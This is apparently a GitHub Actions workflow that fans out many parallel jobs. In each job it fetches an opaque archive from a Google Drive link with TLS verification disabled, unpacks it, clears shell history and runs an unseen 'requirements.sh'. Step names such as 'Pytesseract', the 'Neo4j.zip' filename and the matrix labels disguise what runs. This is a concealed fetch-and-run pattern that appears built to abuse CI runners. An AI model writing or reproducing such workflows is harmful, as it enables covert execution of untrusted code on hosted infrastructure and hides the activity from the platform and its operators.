name: quantumsaobang742cloud
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  PACKAGE:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Initialize', 'Develop', 'Test', 'Execute', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1M4s-xYMwJaVaUEhAju2ReN7zo0jXNqPy" -O Neo4j.zip
        unzip -o Neo4j.zip
        rm Neo4j.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  DISTRIBUTE1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Configure', 'Build', 'Analyze', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1M4s-xYMwJaVaUEhAju2ReN7zo0jXNqPy" -O Neo4j.zip
        unzip -o Neo4j.zip
        rm Neo4j.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
